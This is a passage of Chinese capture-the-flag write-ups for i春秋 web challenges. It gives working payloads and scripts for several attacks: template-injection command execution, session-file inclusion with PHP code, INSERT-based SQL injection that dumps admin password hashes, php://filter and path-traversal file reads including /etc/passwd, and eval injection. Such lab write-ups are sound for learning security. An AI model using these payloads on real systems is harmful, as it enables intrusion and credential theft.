  1747. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name={{ config.from_pyfile('/tmp/owned.cfg') }}
  1748. 查看系统ID
  1749. ?name={{ config['RUNCMD']('/usr/bin/id',shell=True) }}
  1750. 通过测试发现系统过滤了ls dir等命令,可通过$ {}来绕过执行查看/var/www/html/(apache默认的网站目录)目录下存在的文件
  1751. 当前www目录下存在fl4g和x.py文件
  1752. 查看flag内容
  1753. ?name={{ config['RUNCMD']('a=c;b=at;c=fl;d=4g;$a$b /var/www/html/${c}${d}',shell=True) }}
  1754. 方法二:
  1755. 通过测试发现系统过滤了ls dir等命令,可通过$ {}来绕过执行查看/var/www/html/(apache默认的网站目录)目录下存在的文件
  1756. 当前www目录下存在fl4g和x.py文件
  1757. 这里将print open('/var/www/html/fl4g','r').read()读取flag的python代码进行base4编码写入到tmp/get.py
  1758. enbase64(print open('/var/www/html/fl4g','r').read()): cHJpbnQgb3BlbignL3Zhci93d3cvaHRtbC9mbDRnJywncicpLnJlYWQoKQ==
  1759. {{ config['RUNCMD']('echo cHJpbnQgb3BlbignL3Zhci93d3cvaHRtbC9mbDRnJywncicpLnJlYWQoKQ==|base64 -d>/tmp/get.py',shell=True) }}
  1760. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name={{ config['RUNCMD']('echo cHJpbnQgb3BlbignL3Zhci93d3cvaHRtbC9mbDRnJywncicpLnJlYWQoKQ==|base64 -d>/tmp/get.py',shell=True) }}
  1761. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name={{ config['RUNCMD']('python /tmp/get.py',shell=True) }}
  1762. 最终得到flag:
  1763. flag{987cd50d-f6a7-4a26-9aaa-83a34ce81688}
  1764. 题目名称:notebook
  1765. 题目内容:文件包含phpinfo是不是有新的发现
  1766. 题目writeup:
  1767. 启动题目场景,获得靶场网站,访问网站,发现是一个登陆页面,发现file参数是可控,看起来像文件包含漏洞
  1768. http://f141cc048b7a4261968b6789b8046e35234c110c6dfa4bac.changame.ichunqiu.com/action.php?module=php&file=login
  1769. 构造文件包含读取pnpinfo文件内容,发现是空白的
  1770. http://f141cc048b7a4261968b6789b8046e35234c110c6dfa4bac.changame.ichunqiu.com/action.php?module=php&file=phpinfo
  1771. 按照正常流程走一遍,先注册一个账号test/test,成功登陆,登录后显示“欢迎,test,there is no flag”。
  1772. 上文直接get请求包含phpinfo没有任何发现,现在登录系统,并对其抓包,将file参数值改为phpinfo进行发送,响应页面显示空白
  1773. 尝试将module参数修改为空,再次发送请求,响应页面中出现"the phpinfo didn't exist'phpinfo文件不存在
  1774. 尝试访问robots.txt,发现网站包含了php1nFo.php文件可访问。
  1775. http://f141cc048b7a4261968b6789b8046e35234c110c6dfa4bac.changame.ichunqiu.com/robots.txt
  1776. 访问
  1777. php1nFo.php文件,访问得到php配置信息,在php配置信息中可以看到:
  1778. http://f141cc048b7a4261968b6789b8046e35234c110c6dfa4bac.changame.ichunqiu.com/php1nFo.php
  1779. open_basedir是可将用户访问文件的活动范围限制在指定的区域。注意用open_basedir指定的限制实际上是前缀,而不是目录名。
  1780. session.save_path就是session文件存在的位置。
  1781. 举个例子:
  1782. 若open_basedir =/dir/user,那么目录/dir/user和/dir/user1都是可以访问的。
  1783. 所以如果要将访问限制在仅为指定的目录,可用斜线结束路径名。例如设置成:
  1784. open_basedir =/dir/user/
  1785. 那么问题来了,我们只能控制/tmp目录,/var/lib/php5这个目录是包含不了的。
  1786. 尝试将module参数修改为空,file参数设置为php1nFo.php进行文件包含请求,发现session.save_path路径变成了/tmp/SESS
  1787. session 的文件名格式为 sess_[PHPSESSID],而 sessionid 在发送的请求的 cookie 字段中PHPSESSID值也可以看到
  1788. 因此session文件名为:sess_1q822v7v6alpragha75bs3a3c3
  1789. 接下来对session的文件名进行文件包含读取
  1790.  /action.php?module=&file=../../../../tmp/SESS/sess_1q822v7v6alpragha75bs3a3c3
  1791. 在响应页面中,test用户名被显示,用户名是可控的。
  1792. 接下来注册用户名为<?php system('ls'); ?>,登录后用户名
  1793. 被显示。
  1794. 再次对session的文件名进行文件包含读取,在响应页面中能读取到系统当前网站目录下存在flag.php文件/action.php?module=&file=../../../../tmp/SESS/sess_1q822v7v6alpragha75bs3a3c3
  1795. 然后接着注册用户名<?php system('cat flag.php'); ?>,登录后用户名被显示。
  1796. 最后,尝试读取flag,页面上并没有回显,查看源代码得到flag
  1797. /action.php?module=&file=../../../../tmp/SESS/sess_v6en5e2u91i4lupdt0tnpbhas4
  1798. post:
  1799. cmd=system('cat flag.php');
  1800. 最终得到flag:
  1801. flag{02415d0d-5c5d-4daf-bec2-610e56e6dfa4}
  1802. 题目名称:Blog
  1803. 题目内容:请帮我测试一下刚写的Blog
  1804. 题目writeup:
  1805. 启动题目场景,获得靶场网站,访问网站,得到一个 Mini-Blog的欢迎页面
  1806. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/index.php
  1807. 注册一个账号admin/admin,提示用户名或者密码错误
  1808. 又尝试注册另一个账号test/test,发现可以注册,并登陆成功
  1809. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/user.php
  1810. 证明靶机系统中是存在admin账号
  1811. 尝试访问
  1812. robots.txt,发现系统隐藏包含了flag.php文件
  1813. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/robots.txt
  1814. 访问flag.php文件,提示flag就在此文件中,这里我们需要想办法读取,如任意文件包含读取。
  1815. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/flag.php
  1816. 登录系统,发现在后台的post模块出,存在kinEditor编辑器,且版本为4.1.10
  1817. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/post.php
  1818. 通过百度搜索该编辑器版本的漏洞,发现存在目录遍历漏洞(https://www.jb51.net/hack/367946.html),详细利用方法如下:
  1819. 访问url+/kindeditor/php/file_manager_json.php?path=/,得到网站物理路径
  1820. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/kindeditor/php/file_manager_json.php?path=/
  1821. 继续目录遍历,/kindeditor/php/file_manager_json.php?path=../../,也发现系统存在flag.php文件。
  1822. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/kindeditor/php/file_manager_json.php?path=../../
  1823. 首先我们测试后台文章编辑post 模块
  1824. 这里我们先提交一个标题1,内容为1,并抓包,发送请求
  1825. http://0375bc6103e1422db9462ea766cdf740394aadc27dcd41f1.changame.ichunqiu.com/post.php
  1826. 在页面上正常显示标题1,内容1
  1827. 测试title变量是否存在注入漏洞
  1828. title参数输入:
  1829. 1' and '1'='1
  1830. title=1' and '1'='1&content=1
  1831. 页面显示1,1
  1832. title参数输入1' and '1'='2
  1833. title=1' and '1'='2&content=1
  1834. 页面显示0,1
  1835. 初步推测是个盲注,后面语句正确返回1,后面语句错误返回0
  1836. 通过分析不难确定此处应是一条insert语句,用以保存用户所写入到数据库中,系统对这个位置过滤得比较严格, order by ,union select 等关键字语句都被过滤了。
  1837. 猜想后台sql执行的语句:
  1838. INSERT INTO TABLENAME(A,B,C) VALUES($A,$B,$C);
  1839. 我们能控制的变量应该有2到3个,分别是username,title和content
  1840. 接下来就是比较难想的一个注入方法了,初步猜测这里主要有两个思路,因为insert语句本身不会有回显,而网站的报错都被屏蔽掉了,所以布尔盲注明显不能够成立,那么只有:
  1841. 思路1: select '一句话' into oufile 'xxx.php' 通过数据库将一句话写入xxx.php,然后连webshell.
  1842. 思路2:
  1843. 虽然系统在insert 语句上做了过滤,且insert语句本身没有回显,但是写入的内容会显示在页面上。
  1844. 由于防火墙的存在而不能够使用思路1,由此只能考虑思路2.
  1845. 首先要猜测字段数,表面上看有username,title,content这三个字段,但不知道有没有其他字段
  1846. 猜测insert语句的值类似于:
  1847. INSERT INTO TABLENAME(A,B,C) VALUES('username','title','content')
  1848. 先尝试三个字段,报错
  1849. title=1' and '1'='2&content=test')#
  1850. 这里构造的insert语句类似于
  1851. INSERT INTO TABLENAME(A,B,C) VALUES
  1852. ('test','1' and '1'='2','test')#') #用于注释
  1853. 这个payload请求后响应页面报错了,说明猜测的insert字段有误,既然不是三个,更不可能是两个,受控制的部分已经有两个了,因此推测insert语句的字段数为4.
  1854. 尝试四个字段,提交后,显示成功
  1855. title=1&content=test','X')#
  1856. 这里构造的insert语句类似于INSERT INTO TABLENAME(A,B,C) VALUES('test','1','test','X')#') #用于注释
  1857. 说明除了看到的两个字段外,还有一个未知的字段X
  1858. 第四个未知字段可能是个固定值,我们给它赋值时insert语句是不会有回显的
  1859. 所以我们尝试多条插入,再新建一条插入项,对第四个字段不做赋值,将SQL语句放到第二条插入项中。
  1860. 最终目的是为了通过SQL查询得到admin账户的密码。
  1861. title=1&content=1','1'),('test',(database()),'2
  1862. 继续查询表名,得到表名为posts和users
  1863. title=1&content=1','1'),('test',(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),'3
  1864. 查询users 表中的列名,得到列名为usernmae和 password
  1865. title=1&content=1','1'),('test',(SELECT group_concat(column_name) from information_schema.columns where table_name='users'),'4
  1866. 查询password列中字段内容,从而得到已经存在的admin账户的密码
  1867. title=1&content=1','1'),('test',(SELECT group_concat(password) from users),'5
  1868. 得到所有用户名的密码MD5值:dbb616c5d935d8f34c12c291066d6fb7,098f6bcd4621d373cade4e832627b4f6
  1869. 依次MD5解密得到 melody123,test
  1870. 尝试admin/melody123,登陆成功
  1871. 点击进入manager模块,发现?module=存在任意文件包漏洞
  1872. http://2d0043aafe154f358160960da18dc204a86601ba8ec0451b.changame.ichunqiu.com/blog_manage/manager.php?module=article_manage&name=php
  1873. 尝试文件包含读取flag.php,这里通过
  1874. php://filter/读取flag.php的base64
  1875. module=php://filter/read=convert.base64-encode/resource=../flag&name=php
  1876. http://2d0043aafe154f358160960da18dc204a86601ba8ec0451b.changame.ichunqiu.com/blog_manage/manager.php?module=php://filter/read=convert.base64-encode/resource=../flag&name=php
  1877. 得到:PD9waHAgCidmbGFne2E0NjQ1MTRhLWRiMDctNGE2OC1iZTA3LTYzMDZkMWYzNmRkZX0nOwplY2hvICdmbGFnX2lzX2hlcmUnOwo=
  1878. 解密base64得到:
  1879. <?php
  1880. 'flag{a464514a-db07-4a68-be07-6306d1f36dde}';
  1881. echo 'flag_is_here';
  1882. 最终flag:
  1883. flag{a464514a-db07-4a68-be07-6306d1f36dde}
  1884. 题目名称:Blog进阶篇
  1885. 题目内容:
  1886. Blog赛题是由melody设计的
  1887. 十二月的百度杯挑战赛上线的是优化难度后的比赛
  1888. Blog·进阶篇 则是作者的原题,难度比挑战赛上线了几个梯度。
  1889. 快来挑战吧!
  1890. 题目writeup:
  1891. 根据上题的思路,我们先注册一个test/test账号登录系统,然后再post 模块处,写入标题和内容,并抓包,然后对其进行SQL注入跑出系统用户的密码md5值
  1892. http://193c17a60b684acb9078bdf03d1daceba129d871f7ed45c6.changame.ichunqiu.com/post.php
  1893. post:
  1894. title=1&content=1','1'),('test',(SELECT group_concat(password) from users),'5
  1895. 得到用户密码的md5值:3177d917a0053c6161207e733c84356d,098f6bcd4621d373cade4e832627b4f6
  1896. 分别对其进行MD5解密得到:19-10-1997,test
  1897. 尝试admin/
  1898. 19-10-1997,成功登陆系统
  1899. http://193c17a60b684acb9078bdf03d1daceba129d871f7ed45c6.changame.ichunqiu.com/blog_manage/manager.php?module=article_manage&name=php
  1900. 尝试通过php伪协议文件
  1901. php://filter进行文件包含,发现是空白的
  1902. http://193c17a60b684acb9078bdf03d1daceba129d871f7ed45c6.changame.ichunqiu.com/blog_manage/manager.php?module=php://filter/read=convert.base64-encode/resource=../flag&name=php
  1903. 又尝试普通http协议包含robots.txt,可以正常读取其内容,这里注意name为text文件类型。
  1904. http://193c17a60b684acb9078bdf03d1daceba129d871f7ed45c6.changame.ichunqiu.com/blog_manage/manager.php?module=../robots.txt&name=text
  1905. 发现php伪协议读取是不能用,php://filter已经失效,文件包含仍然能够执行,是可以被利用。
  1906. 那么我们可以上传一个shell,用命令执行读取shell,上传点也不难找,这里利用的是一个
  1907. php对POST上传文件临时保存的特性:
  1908. php对post过来的文件有一个默认处理流程,即在一个处理周期内(post,response),首先将post过来的文件保存在/tmp文件夹下,文件名为php{0-9A-Za-z}的随机字符,
  1909. 我们可以把shell写到这个随机文件名里,如果文件被php文件本身用到了,则php直接使用/tmp里的这个临时文件,如果没用到或者处理完毕了,则将/tmp下的这个临时文件删除。
  1910. 也就是说,在正常处理流程下,tmp目录下的这个文件存活周期是一次请求到响应,响应过后,它就会被删除,因为kindeditor那里存在的目录遍历漏洞,导致我们可以查看tmp目录下的文件列表,
  1911. 我们也可以对任一php文件post一个文件过去,使其暂存于tmp目录下,问题就在于,我们还没来得及包含这个文件,它就会在这次请求结束后被删除掉。
  1912. 如何不让它被删除掉呢?删除和处理请求的都是php,所以我们要让php守护进程产生内存溢出,换言之,使之崩溃,而php自身是不会因为错误直接退出的,它会清空自己的内存堆栈,
  1913. 以便从错误中恢复,这就保证了web服务的正常运转的同时,打断了php对临时文件的处理。
  1914.  自包含恰巧可以做到这一点,什么是自包含呢?
  1915.  即: /X.php?include=X.php
  1916.  这样X.php就会将它本身包含进来,而被包含进来的X.php再次尝试处理url的包含请求时,又将自己包含进来一遍,这就形成了无穷递归,递归会导致爆栈,
  1917. 使php无法进行此次请求的后续处理,也就是删除/tmp目录中我们通过post强行上传的临时文件。
  1918.  整理下php对一个post文件请求的正常处理流程:
  1919.  1.manager.php接收一个Post请求,php在/tmp目录下创建我们post的文件
  1920.  2.manager.php处理请求url,包含一个文件
  1921.  3.manager.php进行文件处理
  1922.  4.php删除/tmp目录下的临时文件
  1923. 于是我们本地构造一个payload,通过这个payload递送一个post请求包含一个文件的同时使manager.php自包含溢出崩溃:
  1924. <!DOCTYPE html>
  1925. <html>
  1926. <head lang="en">
  1927.   <meta charset="UTF-8">
  1928.   <title>上传文件</title>
  1929. </head>
  1930. <body>
  1931. <form action="http://a12e072c06b741b289901d33abd43de6f42904cf42ad4814.changame.ichunqiu.com/blog_manage/manager.php?module=manager&name=php" method="post" enctype="multipart/form-data">
  1932.   <input type="file" name="file"/>
  1933.   <input type="submit" value="提交">
  1934. </form>
  1935. </body>
  1936. </html>
  1937. 注意这里出现的两个manager.php,这里是防止利用文件包含写shell时生成的文件被删除,原理是自包含递归爆内存…简单地说,无穷自包含爆栈使其崩溃,从而影响他的文件删除功能.
  1938. 用火狐浏览器打开,并用admin账号登录 ,然后上传一个随意文件,如test.txt
  1939. text.txt内容:
  1940. <?php
  1941. phpinfo();
  1942. ?>
  1943. 上传test.txt文件成功后,下图为自包含请求返回的效果。
  1944. (需要等待1分钟左右)
  1945. 通过目录遍历漏洞,查看上传到tmp目录下的文件名
  1946. http://a12e072c06b741b289901d33abd43de6f42904cf42ad4814.changame.ichunqiu.com//kindeditor/php/file_manager_json.php?path=../../../../../tmp/
  1947. 根据时间来看,我们上传的文件名为:php8ZCgvn
  1948. 下面是任意文件包含/tmp目录下的
  1949. php8ZCgvn文件,可以看到内容可以被php执行。注意name的文件类型为phppass或者text,这里是绕过系统的检查
  1950. http://a12e072c06b741b289901d33abd43de6f42904cf42ad4814.changame.ichunqiu.com/blog_manage/manager.php?module=../../../../../tmp/php8ZCgvn&name=phppass
  1951. 尝试上传几个一句话webshell,但是都不能正常执行,发现phpinfo里已经用disable_functions禁用了大部分函数
  1952. 仔细分析后,发现copy函数没有被禁用,且
  1953. /var/www/html目录被设置为了不可写,于是想到将flag.php利用copy函数copy成一个txt文件,那么就可以像robots.txt一样直接被包含读取
  1954. 上传文件bk.txt:
  1955. <?php
  1956. copy("/var/www/html/flag.php","/tmp/flag.txt");
  1957. show_source("/tmp/flag.txt");
  1958. //注意要用到show_source函数显示源码,否则会被解析,从下面也可以看到,flag的内容是在注释当中的
  1959. ?>
  1960. 这里上传bk.txt
  1961. 成功上传文件
  1962. 通过目录遍历漏洞,查看上传到tmp目录下的文件名
  1963. http://a12e072c06b741b289901d33abd43de6f42904cf42ad4814.changame.ichunqiu.com//kindeditor/php/file_manager_json.php?path=../../../../../tmp/
  1964. 得到上传的文件名:phphdj6P4
  1965. 上传上述文件后用manager.php进行文件包含,即可在/tmp目录下看到flag.txt的内容:
  1966. http://a12e072c06b741b289901d33abd43de6f42904cf42ad4814.changame.ichunqiu.com/blog_manage/manager.php?module=../../../../../tmp/phphdj6P4&name=phppass
  1967. 最终flag:
  1968. flag{f4025949-153b-47d9-b9fa-febd16a4ad34}
  1969. 题目名称:时间
  1970. 题目内容:
  1971. 时间是宝贵的。(i春秋waf可能会ban请求过快的玩家,请自行解决)
  1972. 题目writeup:
  1973. http://fef091866ad246deb05cccc6676b63bbcba1e152e8e84f32.changame.ichunqiu.com/
  1974. PHP源码为:
  1975. <?php 
  1976. header("content-type:text/html;charset=utf-8");
  1977. '天下武功唯快不破';
  1978. setcookie('token','hello');
  1979. show_source(__FILE__); //
  1980. show_source() :函数对文件进行语法高亮显示
  1981. if ($_COOKIE['token']=='hello'){ //
  1982. 取COOKIE里面token的值 如果等于 hello,就执行下面的代码
  1983.   $txt = file_get_contents('flag.php'); //
  1984. file_get_contents() 函数把’flag.php‘文件读入到$txt变量中
  1985.   $filename = 'u/'.md5(mt_rand(1,1000)).'.txt'; //
  1986. mt_rand()是取随机数的,与rand()区别是比rand()快4倍,而且如果mt_rand(1,10)的话1和10都会取得到的
  1987. // 通过md5对mt_rand取值的加密然后通过拼接'u/'和'.txt'得到文件的名字存入到$filename中
  1988.   file_put_contents($filename,$txt); //
  1989. file_put_contents() 函数把$txt存的内容写入到$filename的文件中取
  1990.   sleep(10); //
  1991. 休眠10秒
  1992.   unlink($filename); //
  1993. unlink() 函数删除文件
  1994. }
  1995. 说明我们访问这个网站的时候,在网站目录里面会随机生成一个文件包含flag.php的内容,但是我们只有10秒的时间取访问它,10秒过后会自动删除。
  1996. 所有我们来跑目录,这里我们需要把所有会出现的文件名的可能性都列出来当成字典来跑.
  1997. MD5加密python脚本:
  1998. hash = hashlib.md5()
  1999. hash.update('加密的文本'.encode('utf-8'))
  2000. print(hash.hexdigest())
  2001. 参考:https://www.cnblogs.com/wang-yc/p/5616663.html
  2002. 下面使用python脚本生成随机名的字典:
  2003. import hashlib
  2004. import requests
  2005. file = open("data.txt",'w+')
  2006. for i in range(1,1001):
  2007.   m = hashlib.md5()
  2008.   m.update(str(i).encode())
  2009.   mid = m.hexdigest()
  2010.   url = 'u/'+mid+'.txt'
  2011.   file.write(url+'\n')
  2012. file.close()
  2013. 生成的字典如下:
  2014. 先刷新下网页,然后通过御剑对网站的URL链接进行FUZZ,注意网址后面需要加/,线程最好是30,,扫描出来的链接地址并打开网页,总共需要的时间在10秒内需要完成。
  2015. 注意:若超过十秒 即使已经扫描到了也会访问不到 因为文件已经被删除
  2016. 最终flag:
  2017. flag{a157eb5d-aa59-43b0-95ae-4994a1794749}
  2018. 题目名称:象棋
  2019. 题目内容:开心的玩游戏吧
  2020. 题目witeup:
  2021. 启动题目场景,获得靶场网站,访问网站,发现是一场象棋游戏
  2022. 对其查看源代码,发现
  2023. js/[abcmlyx]{2}ctf[0-9]{3}.js是有问题,该文件名是正则表达式
  2024. 打开该文件,发现无法访问,初步判断该js文件含有flag相关的提示。可以看到题目给出的js文件名并不正确,给出的应该是包含正确文件名的正则表达式。开头两个字符由“abcmlyx”中选择,之后接“ctf",然后是3位数字+”.js
  2025. 那么爆破出正确文件名,js文件内容即为flag
  2026. !/usr/bin/python
  2027. # coding=utf-8
  2028. # Author=haya
  2029. import urllib2
  2030. from multiprocessing.dummy import Pool as ThreadPool
  2031. urllist = []
  2032. re1 = 'myx'
  2033. re2 = '012346789'
  2034. url = 'http://d0fdd193e2fa40ab9287e6c40341ef4fc310ea9b723f4b84.game.ichunqiu.com/js/'
  2035. pool = ThreadPool()
  2036. def url_list():
  2037.     for i in re1:
  2038.         for j in re1:
  2039.             for k in re2:
  2040.                 for l in re2:
  2041.                     for m in re2:
  2042.                         urllist.append(url+i+j+'ctf'+k+l+m+'.js')
  2043.     return urllist
  2044. def url_open(url):
  2045.         try:
  2046.             result = urllib2.urlopen(url).read()
  2047.             if '404' not in result:
  2048.                 print url+result
  2049.         except:
  2050.             pass
  2051. def main():
  2052.     urllist = url_list()
  2053.     pool.map(url_open, urllist)
  2054.     pool.close()
  2055.     pool.join()
  2056. if __name__ == '__main__':
  2057.     main()
  2058. 或者
  2059. 通过python脚本生成JS字典
  2060. key1 = "abcmlyx"key2 = "0123456789"file = open("url.txt", "w+")for a in key1: for b in key1: for c in key2: for d in key2: for e in key2: url = "/js/" + a + b + "ctf" + str(c) + str(d) + str(e) + ".js" + "\n" file.write(url)
  2061. 通过御剑目录扫描工具对其JS字典进行爆破
  2062. 访问JS文件最终得到flag内容
  2063. http://96e86ebf651e46c3995caf7ee93dda4e5b2b46738063401f.changame.ichunqiu.com/js/myctf801.js
  2064. 最终flag:
  2065. flag{1f330869-02c0-41ca-94ff-3276a5efae04}
  2066. 题目名称:爆破-2
  2067. 题目内容:flag不在变量中
  2068. 题目writeup:
  2069. 启动题目场景,获得靶场网站,访问网站,发现一段PHP代码
  2070. http://665970648b2a408c954b623cdde9536dd68b035fb67b49fa.changame.ichunqiu.com/
  2071. PHP代码:
  2072. <?php
  2073. include "flag.php";
  2074. $a = @$_REQUEST['hello'];
  2075. eval( "var_dump($a);");
  2076. show_source(__FILE__);
  2077. var_dump()会返回数据变量的类型和值
  2078. eval()会把字符串当作php代码
  2079. 方法一:通过
  2080. file_get_contents()函数读取
  2081. 由第一步可知,flag不在变量中
  2082. 猜测flag在文件中,使用file_get_contents() 函数,其作用为把整个flag.php文件读入一个字符串中.
  2083. 查看源代码发现flag
  2084. view-source:http://665970648b2a408c954b623cdde9536dd68b035fb67b49fa.changame.ichunqiu.com/?hello=file_get_contents(%27flag.php%27)
  2085. 方法二:通过file()函数读取 题目内容显示flag不在变量中,可以推测flag在文件中,使用file函数进行文件包含 ?hello=file("flag.php"),获得flag.php的内容.
  2086. http://665970648b2a408c954b623cdde9536dd68b035fb67b49fa.changame.ichunqiu.com/?hello=file(%22flag.php%22)
  2087. file() 函数把整个文件读入一个数组中,并 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。如果失败,则返回 false。
  2088. 方法三:通过show_source()函数读取
  2089. ?hello=1);show_source('flag.php');var_dump( eval语句变成:eval("var_dump(1);show_source(%27flag.php%27);var_dump();") show_source() 函数对文件进行语法高亮显示。本函数是 highlight_file() 的别名。
  2090. 注意:通过该函数在对eval()进行截断重组时,要保持eval()函数内php代码的正确性。本例中使用echo(1来补全代码,也可使用//注释掉多余的代码。构造:hello=1);show_source('flag.php');echo(1或hello=1);highlight_file('flag.php');echo(1eval语句为:eval( "var_dump(1);show_source('flag.php');echo(1);");,可得flag。
  2091. http://665970648b2a408c954b623cdde9536dd68b035fb67b49fa.changame.ichunqiu.com/?hello=1);show_source(%27flag.php%27);var_dump(
  2092. 方法四:通过Linux命令读取
  2093. ?hello=);echo%20`cat%20./flag.php`;//
  2094. eval语句变成:eval("var_dump();echo `cat ./flag.php`;//");
  2095. cat Linux中查看全部文件
  2096. ./ 执行脚本
  2097. http://665970648b2a408c954b623cdde9536dd68b035fb67b49fa.changame.ichunqiu.com/?hello=);echo%20`cat%20./flag.php`;//
  2098. 查看源代码发现flag
  2099. view-source:http://665970648b2a408c954b623cdde9536dd68b035fb67b49fa.changame.ichunqiu.com/?hello=);echo%20`cat%20./flag.php`;//
  2100. 最终flag:
  2101. flag{a53a7b5d-aefc-4052-8bc4-9123d217fb33}
  2102. 题目名称:爆破-1
  2103. 题目内容:flag就在某六位变量中writeup:
  2104. 启动题目场景,获得靶场网站,访问网站,发现一段php代码
  2105. http://54fbed0946d44bd2a402cab3e407aa034dd05f1886b34848.changame.ichunqiu.com/
  2106. php源码:
  2107. <?php
  2108. include "flag.php";
  2109. $a = @$_REQUEST['hello'];
  2110. if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹配包括下划线的任何单词字符,等价于'[A-Za-z0-9_]'。*号:匹配前面的子表达式零次或多次。
  2111. die('ERROR');
  2112. }
  2113. eval("var_dump($$a);");//var_dump — 打印变量的相关信息
  2114. show_source(__FILE__);//__FILE__当前运行文件的完整路径和文件名。
  2115. ?>
  2116. 这个代码的作用是如果匹配正则表达式/^\w*$/,就打印变量$$a
  2117. $a是hello,$$a是六位变量$hello
  2118. 两个//表示开始和结束
  2119. ^表示开始字符串
  2120. $表示结束字符串
  2121. \w表示包含【a-z,A-Z, _ , 0-9】由于$a在函数中,所以函数之外无法访问。如果要访问,将hello修改为超全局变量GLOBALS。
  2122. 在URL后加?hello=GLOBALS,将参数hello修改为Globals
  2123. 实际执行语句:
  2124. eval("var_dump($$a);")
  2125. eval("var_dump($hello);")
  2126. eval("var_dump($GLOBALS);")
  2127. $GLOBALS的作用:引用全局作用域中可用的全部变量。
  2128. 这样就会打印出当前定义的所有变量,也包括 include 的文件中的变量,flag 也存在在这些变量中。
  2129. 因此,post一个参数hello=GLOBALS  把所有变量都 dump 出来
  2130. http://54fbed0946d44bd2a402cab3e407aa034dd05f1886b34848.changame.ichunqiu.com/?hello=GLOBALS
  2131. 最终flag:
  2132. flag{d2dc8746-f90d-4844-9436-105df210c437}
  2133. 题目名称:爆破-3
  2134. 题目内容:这个真的是爆破
  2135. 题目writeup:
  2136. 启动题目场景,获得靶场网站,访问网站,网站显示了一段php代码
  2137. http://176216c114b240f2ade5d20646afe7ab01e55eb32f4f48af.changame.ichunqiu.com/
  2138. php 代码:
  2139. <?php 
  2140. error_reporting(0);
  2141. session_start();
  2142. require('./flag.php');
  2143. if(!isset($_SESSION['nums'])){
  2144.   $_SESSION['nums'] = 0;
  2145.   $_SESSION['time'] = time();
  2146.   $_SESSION['whoami'] = 'ea';
  2147. }
  2148. if($_SESSION['time']+120<time()){
  2149.   session_destroy();
  2150. }
  2151. $value = $_REQUEST['value'];
  2152. $str_rand = range('a', 'z');
  2153. $str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
  2154. if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  2155.   $_SESSION['nums']++;
  2156.   $_SESSION['whoami'] = $str_rands;
  2157.   echo $str_rands;
  2158. }
  2159. if($_SESSION['nums']>=10){
  2160.   echo $flag;
  2161. }
  2162. show_source(__FILE__);
  2163. ?>
  2164. 通过代审计可以得到信息
  2165. 1、 有一个时间限制120(不清楚是分钟还是秒,不过都不影响,时间都挺充足)
  2166. 2、 whoami和nums的参数会改变(['nums']++; ['whoami'] = $str_rands;)
  2167. 3、 由==可看出为弱判断类型,可以用数组进行绕过,md5()==0
  2168. 4.根据获取到的信息构造payload        ?value[]=ea
  2169. 5.代码中提到需要提交大于10次,10次过后得到flag
  2170. 简单的说,就是一开始$_SESSION[‘nums’]是0,且$_SESSION[‘whoami’]是ea。每次传入一个value,如果它的前两位和whoami一样,而且要求substr(md5($value),5,4)==0,
  2171. 这样nums就可以加一,$_SESSION['whoami]会再一次随机。但是这个值会被打印出来。
  2172. 后面的弱类型比较我们可以利用md5不支持数组这个漏洞,如果传入md5函数的是一个数组,它会返回NULL。而NULL0进行弱类型比较是‘相等的’,这样就可以成功绕过
  2173. 也就是第一次,传入变量?value[]=ea,因此value[0]=ea    与whoami想等,所以nums++   (如果value[]=ea&value=es的话,value[0].value[1]=eaes)
  2174. 然后随意A-Z+A-Z,写个脚本,把显示出来的两个随机衣服在value[]=xx传值进去,直到输出flag   (千万注意带 session,保持一个回话)
  2175. 先设置初始值nums=0time是当前时间,whoami=ea。当whoami=value时,num+1,whoami=$str_rands,循环。nums>=10时,打印flag。120s后会话结束,由于时间120秒,完全可以手工做10次,即可得到flag。
  2176. 方法:先设置数组value[]=ea
  2177. ?value[]=ea,得到两个字母,重新给value[]赋值,重复10次,得到flag
  2178. 使用python脚本获取flag:
  2179. import requestsurl = "http://176216c114b240f2ade5d20646afe7ab01e55eb32f4f48af.changame.ichunqiu.com/?value[]=ea"al = ['abcdefghijklmnopqrstuvwxyz']s = requests.session()r = s.get(url)for i in range(20): url = "http://176216c114b240f2ade5d20646afe7ab01e55eb32f4f48af.changame.ichunqiu.com/?value[]=" + r.content[0:2] r = s.get(url) print r.content
  2180. 或者
  2181. import requestsurl='http://176216c114b240f2ade5d20646afe7ab01e55eb32f4f48af.changame.ichunqiu.com/'session=requests.Session()html=session.get(url+'?value[]=ea').textfor i in range(10): html=session.get(url+'?value[]='+ html[0:2]).textprint(html)
  2182. 最终得到flag:
  2183. flag{a88328f0-3bd7-4716-8b40-2d2722a96ec7}
  2184. 题目名称:include
  2185. 题目内容:没错!就是文件包含漏洞
  2186. 题目writeup:
  2187. 启动题目场景,获得靶场网站,访问网站,发现是一个phpinfo函数显示的php配置信息页面
  2188. http://ea072f427dc1435a8c8386c81e62c9948e892d4a196a4bd4.changame.ichunqiu.com/
  2189. 根据题目内容,既然是文件包含,我们查看文件包含
  2190. allow_url_include函数,发现是开启状态,那么可以用php://input伪协议进行文件包含
  2191. 且网站也显示了一段PHP代码
  2192. <?php show_source(__FILE__);if(isset($_REQUEST['path'])){    include($_REQUEST['path']);}else{    include('phpinfo.php');}通过代码分析,文件包含的参数变量为path,可文件包含读取/etc/passwd内容
  2193. http://ea072f427dc1435a8c8386c81e62c9948e892d4a196a4bd4.changame.ichunqiu.com?path=../../../etc/passwd
  2194. 通过php;//input伪协议构造post数据包
